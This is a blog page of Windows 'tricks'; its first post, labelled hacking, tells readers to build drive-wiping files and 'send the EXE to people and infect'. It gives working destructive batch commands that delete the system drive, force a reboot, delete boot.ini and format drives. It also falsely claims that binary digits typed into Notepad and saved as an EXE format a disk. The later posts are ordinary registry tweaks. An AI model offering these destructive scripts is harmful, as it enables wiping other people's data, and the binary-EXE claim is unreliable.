      How to Format A HDD With Notepad, Formating Drive
      Posted by
      Admin
      Labels:
      Learn Hacking
      0
      comments
      How to Format A HDD With Notepad
      If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.
      Step 1.
      Copy The Following In Notepad Exactly as it says01001011000111110010010101010101010000011111100000
      Step 2.
      Save As An EXE Any Name Will Do
      Step 3.
      Send the EXE to People And Infect
      OR
      IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
      format c:\ /Q/X — this will format your drive c:\
      01100110011011110111001001101101011000010111010000 100000011000110011101001011100
      0010000000101111010100010010111101011000
      format d:\ /Q/X — this will format your dirve d:\
      01100110011011110111001001101101011000010111010000 100000011001000011101001011100
      0010000000101111010100010010111101011000
      format a:\ /Q/X — this will format your drive a:\
      01100110011011110111001001101101011000010111010000 100000011000010011101001011100
      0010000000101111010100010010111101011000
      del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
      01100100011001010110110000100000001011110100011000 101111010100110010111101010001
      00100000011000110011101001011100011000100110111101 101111011101000010111001101001
      0110111001101001
      try to figure out urself rest
      cant spoonfeed
      its working
      Do not try it on your PC. Don’t mess around this is for educational purpose only
      still if you cant figure it out try this
      go to notepad and type the following:
      @Echo off
      Del C:\ *.*|y
      save it as Dell.bat
      want worse then type the following:
      @echo off
      del %systemdrive%\*.*/f/s/q
      shutdown -r -f -t 00
      and save it as a .bat file
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Monday, October 5, 2009
      Windows Desktop Tips & Tricks | Desktop Tips & Tricks
      Posted by
      Admin
      Labels:
      Learn Hacking,
      Windows Tricks
      0
      comments
      Make the background of desktop icons transparent (XP)
      Control Panel > System > Advanced > Performance Settings. On the Visual Effects tab, check Use drop shadows for icon labels on the desktop.
      Restore My Documents folder if deleted (98)
      To restore My Documents to the Desktop, click Start, then Run, and type:rundll32 mydocs.dll, RestoreMyDocsFolder
      Remove shortcut icon arrows
      Go to [HKEY_CLASSES_ROOT\LNKFILE], and delete IsShortcut Go to [HKEY_CLASSES_ROOT\PIFFILE], and delete IsShortcut
      Change My Computer’s Icon
      Windows 98: Control Panel > Display > Appearance Windows XP: Control Panel > Display > Desktop > Customize Desktop
      Hide Icon
      Hide all Desktop icons (9x/XP)
      HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer NoDesktop (DWORD value): Set to 1 to hide all icons. Delete NoDesktop to undo. Hit F5 to refresh the desktop. Hide Network Neighborhood, My Network Places (9x) Run Poledit.exe (You may have to install it: It is on your Windows CD in\tools\reskit\netadmin\poledit). File > Open Registry > (double click) Local User > Shell > Restrictions Check Hide Network Neighborhood or/and My Network Places OK > File > Save Reboot.
      Hide My Documents, My Computer, My Network Places, Internet Explorer (XP)
      Right-click on the desktop, then click Properties > Desktop > Customize Desktop
      Hide My Computer (9x/XP)
      Create a transparent icon or create a bmp file that consists of a single pixel. In Display properties effects, change the My Computer icon to point at your new icon. Rename My Computer to one space.
      Add and remove item types from the New Menu
      Add Item Types
      When you right-click on your desktop, there is a New submenu that contains a list of templates. A template is visible if the related entry in the [HKEY_CLASSES_ROOT] hive associated with a file extension has a sub-key called ShellNew. For example, on the New submenu there is an entry for Text Document. This entry is visible because of the key [HKEY_CLASSES_ROOT\.txt\ShellNew]. Create a blank document of the corresponding application, and put it into the Windows\ShellNew Folder. Go to that file type under [HKEY_CLASSES_ROOT], create a subkey named ShellNew and create the string-value File Name in it. Change this string’s value to the blank document’s filename.
      Ex: [HKEY_CLASSES_ROOT\.wav\ShellNew\FileName], and FileName’s value = “sndrec.wav”.
      Remove Item Types
      Read Add Item Types, and delete or rename the subkey named ShellNew. Hit F5 to update the items in the New submenu.
      Save color scheme
      Export [HKEY_USERS\.DEFAULT\Control Panel\Appearance\Schemes\Name of Scheme]
      Create tool tips for desktop icons.
      Search the registry for keys with the name Info Tip. You may replace the descriptions and you may add Info Tip keys for other Class-IDs.
      Create a button to Reboot Windows XP
      To create a reboot icon on your desktop: Right click on an open area of the desktop Select New/Shortcut Enter in “shutdown -r -t 00″ – no quotes Press Next For the name, enter Reboot or anything you like. Click Finish.
      Remove Shortcut arrow from Desktop icons
      Here’s how you can remove those shortcut arrows from your desktop icons in Windows XP. Start regedit. Navigate to HKEY_CLASSES_ROOTlnkfile Delete the IsShortcut registry value. You may need to restart Windows XP.
      Performance Increase through My Computer
      Start > Right Click on My Computer and select properties. Click on the “Advanced” tab See the “Performance” section? Click “Settings” Disable all or some of the following: Fade or slide menus into view Fade or slide ToolTips into view Fade out menu items after clicking Show Shadows under menus Slide open combo boxes Slide taskbar buttons Use a background image for each folder type Use common tasks in folders
      Change Briefcase icon on NT/W2K/XP
      You can change the Briefcase icon and replace it with an icon of a metal attachГ© case using the following Windows NT/W2K/XP registry hack: Hive: HKEY_CLASSES_ROOT Key: CLSID\85BBD0920-42A0-1069-A2E4-08002B30309D Name: DefaultIcon Type: REG_EXPAND_SZ Value: %SystemRoot%\system32\syncui.dll,1 (shiny metal attachГ© icon) Value: %SystemRoot%\system32\syncui.dll,0 (default leather Briefcase icon) Download these registry files already made:
      Leather.reg
      MetalAttache.reg
      After changing to the icon, you may have to log off then log back on or restart your computer for the change to take effect.
      Create a Lock Computer Shortcut Icon
      1. Right click on the desktop, select New > Shortcut. 2. Enter rundll32.exe user32.dll,LockWorkStation as the shortcut. 3. Name it Lock Computer. 4. Right click and choose Properties. 5. Click on “Change Icon” 6. Search through shell32.dll in the System32 directory and find an appropriate lock icon. NOTE: This effectively dumps you back to the “Welcome” log on screen. Of course this will only work if you have entered a password for your profile. ADDENDUM: If you want added security, go to the Control Panel and click on “User Accounts”. Click “Change the way users log on or off”, and deselect the “Use the Welcome Screen” option.This will switch Windows back to the classic log in box.
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Sunday, October 4, 2009
      How to disable Right click on Desktop
      Posted by
      Admin
      Labels:
      Windows Tricks
      0
      comments
      Follow the given steps to disable the right click functionality on desktop:
      To use this feature, you will need to be logged into your computer with administrative rights.
      Click Start button and type regedit in Run option then press Enter for next.
      Here locate the location to: HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\ExplorerHere in right side panel, right click to create a new DWORD value with the name NoViewContextMenu (it is case sensitive), then assign number 1 in value data box.
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Saturday, October 3, 2009
      How to disable”Turn Off Computer”button in XP?
      Posted by
      Admin
      Labels:
      How to,
      Windows Tricks
      0
      comments
      Today tip is very useful particularly for those users who want to restrict the common users to shutdown public computer in common areas. You can disable the “Turn off Computer” button on the start menu and a common user will not “Turn Off, Restart and Stand By” a computer. Using registry editor, you can implement this task in all windows XP versions with minimum effort.Follow the given steps to disable Turn off Computer” button on the start menu:To use this feature, you will need to be logged into your computer with administrative rights.Click Start button and type regedit in Run option then press Enter for next.Here locate the location to:HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\ExplorerHere in right side panel, right click to create a new DWORD value with the name NoClose.
      Now assign number 1 in value data box and close the registry editor.Now close the registry editor and restart your computer after any changes to go into effect.But next time, if you want to enable “Turn Off Computer” button on start menu then simply change the value of data box to 0 or delete NoClose DWORD item.
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Newer Posts
      Older Posts
      Home
      #Text1 display:none;/*remove blank space that the gadget leaves*/
      Categories
      Blogger
      Blogger templates
      Gadgets
      How to
      Internet
      Learn Hacking
      News
      Software
      Windows Tricks
      WordPress
      Stay Connected…
      RSS
      Email
      Twitter
      Facebook
      Subscribe to latest Tech Updates & Verify Email
      Popular Posts
      Top 10 hackers in world | famous hackers till 2011| Best geek hackers
      Beginners guide to hacking Windows
      How to Download complete Website and save it on PC
      How to Download Nokia Ovi Store Applications to Computer via Firefox
      Top Indian hackers | Real Indian Hackers | Best hackers in asia
      How to write a simple trojan in vb6 | Creating a Virus
      Hacking from Web Browser | Hack tricks using browser
      Stats
      Copyright © 2012 Some Rights Reserved
      / Privacy Policy
      Blogger Template by GeekPosts.NET / Powered by Blogger

About Real-Time Advice

  • How breaking news — in the markets, Washington, and around the world — affects you and your money. Have a question about how current events may change your financial future? Email us at ask@smartmoney.com.

.